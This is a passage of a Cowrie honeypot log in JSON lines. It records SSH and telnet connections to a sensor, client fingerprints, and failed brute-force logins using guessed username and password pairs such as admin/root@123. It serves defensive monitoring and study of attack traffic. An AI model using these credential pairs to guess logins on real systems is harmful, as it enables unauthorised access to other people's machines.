roup14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:11:06.630820Z","src_ip":"212.227.235.229","session":"a87bd35f7ba1"}
{"eventid":"cowrie.session.closed","duration":30.975983381271362,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:07.199044Z","src_ip":"212.227.125.160","session":"1ff86cde9c6e"}
{"eventid":"cowrie.login.failed","username":"qbtuser","password":"qbtuser","message":"login attempt [qbtuser/qbtuser] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:07.656088Z","src_ip":"212.227.235.229","session":"a87bd35f7ba1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53576,"dst_ip":"1.2.3.4","dst_port":22,"session":"70c9ebf04017","protocol":"ssh","message":"New connection: 212.227.235.229:53576 (1.2.3.4:22) [session: 70c9ebf04017]","sensor":"my-vps","timestamp":"2025-08-31T05:11:07.679819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:11:07.680676Z","src_ip":"212.227.235.229","session":"70c9ebf04017"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:11:07.936021Z","src_ip":"212.227.235.229","session":"70c9ebf04017"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:08.913267Z","src_ip":"212.227.235.229","session":"a87bd35f7ba1"}
{"eventid":"cowrie.login.failed","username":"singh","password":"singh123","message":"login attempt [singh/singh123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:09.714581Z","src_ip":"212.227.235.229","session":"70c9ebf04017"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:10.972313Z","src_ip":"212.227.235.229","session":"70c9ebf04017"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:12.477392Z","src_ip":"212.227.125.160","session":"7cc367d8d55d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:11:13.858964Z","src_ip":"212.227.235.229","session":"84b7fd8af183"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:11:13.859652Z","src_ip":"212.227.235.229","session":"84b7fd8af183"}
{"eventid":"cowrie.session.connect","src_ip":"1.183.8.246","src_port":50710,"dst_ip":"1.2.3.4","dst_port":23,"session":"148a824bcf16","protocol":"telnet","message":"New connection: 1.183.8.246:50710 (1.2.3.4:23) [session: 148a824bcf16]","sensor":"my-vps","timestamp":"2025-08-31T05:11:14.179461Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38802,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fed7ea72529","protocol":"ssh","message":"New connection: 212.227.235.229:38802 (1.2.3.4:22) [session: 3fed7ea72529]","sensor":"my-vps","timestamp":"2025-08-31T05:11:18.316782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:11:18.317919Z","src_ip":"212.227.235.229","session":"3fed7ea72529"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:11:18.592147Z","src_ip":"212.227.235.229","session":"3fed7ea72529"}
{"eventid":"cowrie.session.closed","duration":"36.3","message":"Connection lost after 36.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:18.663235Z","src_ip":"212.227.125.160","session":"7cc367d8d55d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root@123","message":"login attempt [admin/root@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:19.731421Z","src_ip":"212.227.235.229","session":"3fed7ea72529"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:21.009044Z","src_ip":"212.227.235.229","session":"3fed7ea72529"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59150,"dst_ip":"1.2.3.4","dst_port":22,"session":"723d0eb209d5","protocol":"ssh","message":"New connection: 212.227.235.229:59150 (1.2.3.4:22) [session: 723d0eb209d5]","sensor":"my-vps","timestamp":"2025-08-31T05:11:31.936577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:11:32.826346Z","src_ip":"212.227.235.229","session":"723d0eb209d5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:11:32.827135Z","src_ip":"212.227.235.229","session":"723d0eb209d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52280,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e22f7319bac","protocol":"ssh","message":"New connection: 212.227.235.229:52280 (1.2.3.4:22) [session: 1e22f7319bac]","sensor":"my-vps","timestamp":"2025-08-31T05:11:34.135306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:11:34.136454Z","src_ip":"212.227.235.229","session":"1e22f7319bac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:11:34.217303Z","src_ip":"212.227.235.229","session":"1e22f7319bac"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"pass","message":"login attempt [vpn/pass] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:34.543292Z","src_ip":"212.227.235.229","session":"1e22f7319bac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54230,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3afb23afb6","protocol":"ssh","message":"New connection: 212.227.125.160:54230 (1.2.3.4:22) [session: 3c3afb23afb6]","sensor":"my-vps","timestamp":"2025-08-31T05:11:35.502900Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:35.627445Z","src_ip":"212.227.235.229","session":"1e22f7319bac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52530,"dst_ip":"1.2.3.4","dst_port":22,"session":"e135f0d9c6bb","protocol":"ssh","message":"New connection: 212.227.125.160:52530 (1.2.3.4:22) [session: e135f0d9c6bb]","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.080243Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33148,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10195d856fa","protocol":"ssh","message":"New connection: 212.227.235.229:33148 (1.2.3.4:22) [session: d10195d856fa]","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.484691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.485562Z","src_ip":"212.227.235.229","session":"d10195d856fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.748331Z","src_ip":"212.227.235.229","session":"d10195d856fa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.829179Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:11:37.887533Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodside","message":"login attempt [admin/woodside] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:38.200682Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.login.failed","username":"server","password":"admin123","message":"login attempt [server/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:38.411337Z","src_ip":"212.227.235.229","session":"723d0eb209d5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodrow","message":"login attempt [admin/woodrow] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:39.261238Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.login.failed","username":"dara","password":"dara","message":"login attempt [dara/dara] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:39.557275Z","src_ip":"212.227.235.229","session":"d10195d856fa"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:40.214203Z","src_ip":"212.227.235.229","session":"723d0eb209d5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"witch","message":"login attempt [admin/witch] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:40.322014Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:40.822121Z","src_ip":"212.227.235.229","session":"d10195d856fa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"wayer","message":"login attempt [admin/wayer] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:41.382868Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:41.889410Z","src_ip":"212.227.235.229","session":"84b7fd8af183"}
{"eventid":"cowrie.login.failed","username":"admin","password":"waldo1","message":"login attempt [admin/waldo1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:42.444191Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:43.504827Z","src_ip":"212.227.125.160","session":"e135f0d9c6bb"}
{"eventid":"cowrie.session.closed","duration":30.63041114807129,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:44.809815Z","src_ip":"1.183.8.246","session":"148a824bcf16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49858,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b3245be845","protocol":"ssh","message":"New connection: 212.227.235.229:49858 (1.2.3.4:22) [session: c5b3245be845]","sensor":"my-vps","timestamp":"2025-08-31T05:11:50.915383Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48872,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fb93b37df3e","protocol":"ssh","message":"New connection: 212.227.125.160:48872 (1.2.3.4:22) [session: 5fb93b37df3e]","sensor":"my-vps","timestamp":"2025-08-31T05:11:53.066030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:11:53.554096Z","src_ip":"212.227.125.160","session":"5fb93b37df3e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:11:53.615736Z","src_ip":"212.227.125.160","session":"5fb93b37df3e"}
{"eventid":"cowrie.login.failed","username":"server","password":"admin123","message":"login attempt [server/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:11:55.107763Z","src_ip":"212.227.125.160","session":"5fb93b37df3e"}
{"eventid":"cowrie.session.closed","duration":"20.5","message":"Connection lost after 20.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:55.975451Z","src_ip":"212.227.125.160","session":"3c3afb23afb6"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:11:56.658360Z","src_ip":"212.227.125.160","session":"5fb93b37df3e"}
{"eventid":"cowrie.session.closed","duration":"65.3","message":"Connection lost after 65.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:07.997917Z","src_ip":"212.227.235.229","session":"84b7fd8af183"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44050,"dst_ip":"1.2.3.4","dst_port":22,"session":"fecc4eddf363","protocol":"ssh","message":"New connection: 212.227.235.229:44050 (1.2.3.4:22) [session: fecc4eddf363]","sensor":"my-vps","timestamp":"2025-08-31T05:12:08.461550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:08.462236Z","src_ip":"212.227.235.229","session":"fecc4eddf363"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:08.724887Z","src_ip":"212.227.235.229","session":"fecc4eddf363"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234!@#$","message":"login attempt [ubuntu/1234!@#$] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:09.811458Z","src_ip":"212.227.235.229","session":"fecc4eddf363"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:11.709229Z","src_ip":"212.227.235.229","session":"fecc4eddf363"}
